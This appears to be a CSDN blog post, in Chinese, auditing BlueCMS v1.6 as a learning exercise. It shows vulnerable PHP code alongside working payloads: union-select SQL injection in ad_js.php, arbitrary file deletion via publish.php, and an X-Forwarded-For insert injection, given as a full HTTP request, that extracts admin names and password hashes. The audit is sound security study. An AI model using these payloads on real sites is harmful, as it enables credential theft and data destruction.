bluecmsv1.6代码审计

已于 2023-04-11 11:38:01 修改
阅读量737 收藏
点赞数 1
文章标签: php mysql 数据库
于 2022-06-28 14:32:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42307546/article/details/125496200
版权

本次是对一个简单的cms 进行代码审计作为一个入门,直接用seay进行自动审计
在这里插入图片描述
sql注入漏洞在文件 uploads/ad_js.php
这里通过get方式接受ad_id变量没有任何过滤拼接到sql语句并执行

define('IN_BLUE', true);
require_once dirname(__FILE__) . '/include/common.inc.php';

$ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : '';
if(empty($ad_id))
{
	echo 'Error!';
	exit();
}

$ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);

跟到getone函数直接执行了语句

 function getall($sql, $type=MYSQL_ASSOC){
    	$query = $this->query($sql);
    	while($row = mysql_fetch_array($query,$type)){
    		$rows[] = $row;
    	}
    	return $rows;
    }

验证漏洞直接访问uploads/ad_js.php?id=1’这里加单引号报错了说明有注入尝试下猜字段数
uploads/ad_js.php?ad_id=1%20order%20by%207%20–+
order by 7的时候正常到8直接报错说明有7个字段
union select 1,2,3,4,5,6,7 --+
7为可显字段,这里如果单独看网页是没有内容的必须点击看网页的源码
union select 1,2,3,4,5,6,user() --+
查看当前用户

任意文件删除在uploads/publish.php

elseif($act == 'del_pic')
{
 	$id = $_REQUEST['id'];
 	
 	$db->query("DELETE FROM ".table('post_pic').
 				" WHERE pic_path='$id'");
 				
 				
 				
 	if(file_exists(BLUE_ROOT.$id))
 	{
 	
 		@unlink(BLUE_ROOT.$id);
 	}
}

通过request方式接受id文件名并判断文件是否存在在删除,直接在uploads目录下创建
1.php,直接访问uploads/publish.php?act=del_pic&id=1.php

任意文件包含

elseif ($act == 'pay'){
 	include 'data/pay.cache.php';
 	$price = $_POST['price'];
 	$id = $_POST['id'];
 	$name = $_POST['name'];
 	if (empty($_POST['pay'])) {
 		showmsg('�Բ�����û��ѡ��֧����ʽ');
 	}
 	include 'include/payment/'.$_POST['pay']."/index.php";
 }

这里将post过来的pay进行包含不过限制了目录和文件,需要通过截断来实现
通过%00截断失败了

用下路径长度截断

① 条件:windows OS,点号需要长于256;linux OS 长于4096
Windows下目录最大长度为256字节,超出的部分会被丢弃
Linux下目录最大长度为4096字节,超出的部分会被丢弃
用.号来填充
不知道为什么都没有成功

插入注入在评论区ip头信息没有经过过滤便插入到数据库中,我们可以伪造ip头一次性插入多条语句将管理员的密码爆出来
include/comment.php

f($act == 'send')

{
	if(empty($id))
	{
 		return false;
 	}

 	$user_id = $_SESSION['user_id'] ? $_SESSION['user_id'] : 0;
 	$mood = intval($_POST['mood']);
 	$content = !empty($_POST['comment']) ? htmlspecialchars($_POST['comment']) : '';
 	$content = nl2br($content);
 	$type = intval($_POST['type']);
 	if(empty($content))
 	{
 		showmsg('�������ݲ���Ϊ��');
 	}
 	if($_CFG['comment_is_check'] == 0)
 	{
 		$is_check = 1;
 	}
 	else
 	{
 		$is_check = 0;
 	}

 	$sql = "INSERT INTO ".table('comment')." (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check) 
 			VALUES ('', '$id', '$user_id', '$type', '$mood', '$content', '$timestamp', '".getip()."', '$is_check')";

 	$db->query($sql);
 	if($type == 1)
 	{
 		$db->query("UPDATE ".table('article')." SET comment = comment+1 WHERE id = ".$id);
 	}
 	elseif($type == 0)
 	{
 		$db->query("UPDATE ".table('post')." SET comment = comment+1 WHERE post_id = ".$id);
 	}

访问/uploads/comment.php?id=1
写入评论再用bp抓包增加X-Forwarded-Fo的字段

POST /uploads/comment.php?act=send HTTP/1.1
Host: www.blue1.com:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
X-Forwarded-For: 127.0.0.1','1'),('5', '1', '3', '0', '6', (select concat(admin_name,0x3e,pwd) from blue_admin), '1656396250', '127.0.0.1', '1')##
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
Origin: http://www.blue1.com:8080
Connection: close
Referer: http://www.blue1.com:8080/uploads/comment.php?id=1&type=0
Cookie: detail=5; PHPSESSID=83e76a6a5b87ec8abf5aa6639a8571e9
Upgrade-Insecure-Requests: 1

mood=6&comment=ccccccc&id=1&type=0&submit=%CC%E1%BD%BB%C6%C0%C2%DB

成功的出数据
在这里插入图片描述
加入我的星球能获取到更多的渗透知识在这里插入图片描述

qq_42307546
关注
bluecms代码审计
weixin_44255856的博客
07-06 1351
说明:最近打算入手cms,所以找了一个简单的bluecms先练练手,先立个flag至少一周一个cms. 首先使用seay源码审计工具审计全部的源码 1,发现/uploads/ad_js.php下可能存在sql注入漏洞 打开ad_js.php文件 首先判断是否存在ad_id变量如果存在就执行下面的操作 跟踪getone函数,在mysql.class.php文件中,用于封装为sql语句。 后跟...
代码审计bluecms 文件包含漏洞复现
qq_43233085的博客
03-16 3127
代码审计bluecms 文件包含漏洞复现bluecms代码审计漏洞利用 bluecms BlueCMS是一款专注于地方门户网站建设解决方案,基于PHP+MySQL的技术开发,全部源码开放。 复现版本为bluecmsv1.6版本,各位可自行下载。 代码审计 先使用Seay工具审计一波,根据关键代码回溯。 工具显示user.php文件包含函数存在可控变量,可能存在文件包含漏洞,我们打开代码所在ph...
BlueCMS代码审计
eyyer的博客
02-20 1155
BlueCMS的一次代码审计
33_对bluecms v1.6进行代码审计、用代码审计三种方法分别进行实施、bluecms v1.6下载与安装、定向功能分析法
最新发布
weixin_54591045的博客
08-13 946
bluecms v1.6进行代码审计、用代码审计三种方法分别进行实施、bluecms v1.6下载与安装、定向功能分析法
bluecms_v_1.6sp1代码审计
RestoreJustice的博客
03-23 865
这是一个比较古老的cms,可以说是满目疮痍,更靶场一样。上述漏洞主要是前台的。后台同样存在类似或者没有写到的漏洞。由于自己技术有限,就到这。
bluecms代码审计入门
qq_42307546的博客
06-27 709
php
bluecms 代码审计
2202_75317918的博客
01-31 1106
第一次进行代码审计 ,参考的文章比较多我觉得工具只能起到辅助作用 主要自己要花时间研究发现一些问题时回溯变量,或者直接挖掘功能点的漏洞这里碰到的洞也不是那么高大上,基本都是一些比较基本的洞。
BlueCMS地方分类信息门户 1.6.zip
05-27
BlueCMS地方分类信息门户 1.6 升级改进: 1、修改所有已知错误 2、重新设计系统模板 3、增加会员前台发布新闻、编辑新闻、管理新闻功能 4、增加新闻审核功能 5、增加会员充值功能、预设支付宝和银行汇款 6、...
Bluecms内容管理系统 v1.6sp1
08-29
v1.6演示地址:http://www.bluecms.net/demo 官方网站:http://www.bluecms.net/ 官方论坛:htpp://www.bluecms.net/bbs
代码审计bluecms 前台comment.php注入复现
qq_43233085的博客
03-15 485
代码审计bluecms 前台comment.php注入复现bluecms代码审计漏洞复现 bluecms BlueCMS是一款专注于地方门户网站建设解决方案,基于PHP+MySQL的技术开发,全部源码开放。 复现版本为bluecmsv1.6版本,各位可自行下载。 代码审计 先使用Seay工具审计一波,根据关键代码回溯。 工具显示comment.php获取ip地址可伪造,我们打开代码所在php文...
代码审计bluecms——sql注入
willow_liang的博客
10-28 819
bluecmsv1.6 php5.3+apache 1.漏洞注入点分析 1.找输入点,全局搜索接收参数的地方 2.找数据库语句定义,查看是否拼接了可控变量 3.根据源码挖注入 2.用phpstorm进行跟踪ad_js.php文件,burpsuite抓包进行sql注入测试 3.用phpstorm进行调试,跳到table函数,进行对数据表加blue前缀,和表的名称 function table($table) { global $pre; return $pre .$table ; 4.定位到函数ge
PHP地方门户系统-BlueCMS v1.6 sp1.rar
07-07
产品定位: 地方分类信息门户专用程序 产品特点: 1、基于当今最流行的开源组合PHPMYSQL开发 2、每个分类均可单独设置Title、Keywords、Description,方便SEO 3、强力模板引擎,显示风格自由定义,随心所欲 4、多功能模块插件,操作简单方便 5、智能缓存技术,提高网站性能 6、多属性模型自定义,栏目功能强大 7、完美整合DZ、UCHOME等流行软件,用户数据统一同步 安装环境: 可用的 httpd 服务器(如 Apache、Zeus、IIS 等) PHP 4.1.0 及以上 MySQL 4.1 及以上 bluecms v1.6 升级到 bluecms v1.6 sp1版说明: 解决问题: 1.修正所有已知错误 2.前后台整合通用编辑器fckeditor,替换之前的editor 3.增加前台发布新闻过滤 4.增加禁止词语过滤 5.增加同一用户注册时间间隔30秒,防止注册机恶意注册 6.修改会员中心部分模板 7.修改数据库备份还原,增加分卷备份 8.增加页面压缩,通过空间是否支持以及后台是否开启来控制
Bluecms代码审计
末初的CSDN博客
03-17 2502
一次简单的代码审计实战来自风哥的一篇文章 这第一篇文章只是一个前言,第二篇文章是我看完风哥的审计过程,然后我自己审计的文章。 环境搭建 phpstudy BlueCMSv1.6sp源码 代码审计工具 总结功能点 BlueCMS本次代码审计实战靶场 拿到这样一个CMS我们首先应该对这个站的正常功能进行测试,看一看存在哪些功能,这里的测试方法是黑盒加白盒,以风哥的观点,挖掘漏洞的核心在于传参,知道了...
代码审计学习-BlueCMS框架代码审计
Alexhirchi的博客
11-05 1727
第一次的代码审计--BlueCMS代码审计 之前总说要学习代码审计,但每次面对大量代码时,又没什么开发经验,都是浅尝即止,面对几千行的代码毫无开始的头绪。(看来又印证了那句话:基础决定上层建筑)作为萌新 最开始我还是先去看了许多大佬的文章,了解一下他们的学习路线,并且学习了一些新的思路。这次挑了个小众的CMS入手–BlueCMS作为我的代码审计开始,顺便分享一些自己的总结。 环境配置: BlueCMS v1.6 sp1 windows7 PHP 5.4.45 + Apache +mysql 5.7..
代码审计Bluecms—sql—search.php(无)
王嘟嘟的博客
10-27 335
0x00 前言 如饥似渴的学习ing。 你可能需要看看: https://blog.csdn.net/qq_36869808/article/details/83029980 0x01 start 直接来看吧。 这里的变量是$cid,向上溯源 这里发现有intval。看之前的文章吧,不啰嗦。 ...
BlueCms v1.6 本地文件包含漏洞代码审计
内心不种满鲜花就会长满杂草
09-15 5358
目录 BlueCms POC构造 漏洞利用 BlueCms BlueCMS是一款专注于地方门户网站建设解决方案,基于PHP+MySQL的技术开发,全部源码开放。 复现版本为bluecmsv1.6版本,各位可自行下载。 POC构造 可以先用代码审计工具如Seay扫一波,或者直接观察代码。如下在user.php中,可以看到,如果act参数为pay值,这包含 'include/payment/'.$_POST['pay']."/index.php" 文件,其中pay参数没有过滤。按道理只要截断一下,
适合初学者的代码审计——BlueCMS v1.6 sp1
weixin_50464560的博客
10-02 973
转载至https://www.anquanke.com/post/id/178545 robots   0x00 前言 大家好,我是聂风,在此,我做一个简单的代码审计的文章来方便同学们学习。BlueCMS v1.6 sp1一直以来就是PHP代码审计入门的最佳良品。这次我们就选择这一个案例进行学习。我先声明,我的代码审计方法是针对代码基础较为薄弱较薄弱的人群进行代码审计。   0x01 环境搭建 Phpstudy BlueCMS v1.6 sp1源码 代码审计工具(Seay源代码审计
bluecms_v1.6_sp1审计
Amdy_amdy的博客
09-26 1046
针对用户的输入输出   数据流进行追踪审计 知识点: inval()只获取变量的整数值。          -针对数据进行过滤的方式,是有效的。 addslashes将特殊符号添加\进行防御      int型注入可以突破这种过滤   疑问: do_edit_pwd   处,验证是否有问题 user_name 开始安装页面: 1、http://localhost/blue...
代码审计Bluecms v1.6
GKD2019的博客
07-26 663
漏洞列表如下(共计32个漏洞,附Exp,按时间顺序): 未完待续…Exp:``http://127.0.0.3/bluecms/user.php?act=edit_user_info Post:face_pic3=2.php` 2、ad_js.php 19行处存在sql注入漏洞 Exp: 3、include/common.fun.php->getip()存在ip伪造漏洞 4、user.php 955行处存在任意文件删除漏洞 Exp:``http://127.0.0.3/bluecms/user.php?a
C:\Users\86138\AppData\Local\Temp\ccq4Q3EM.o:ԲĹϵ.cpp:(.text+0x1f3): undefined reference to `Point::set_y(int)'
03-09
这个问题是关于编程的,我可以回答。这个错误是因为在编译时没有找到 Point 类的 set_y 函数的定义。可能是因为没有正确链接 Point 类的实现文件或者没有在代码中正确包含 Point 类的头文件。需要检查代码中的链接和包含语句是否正确。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值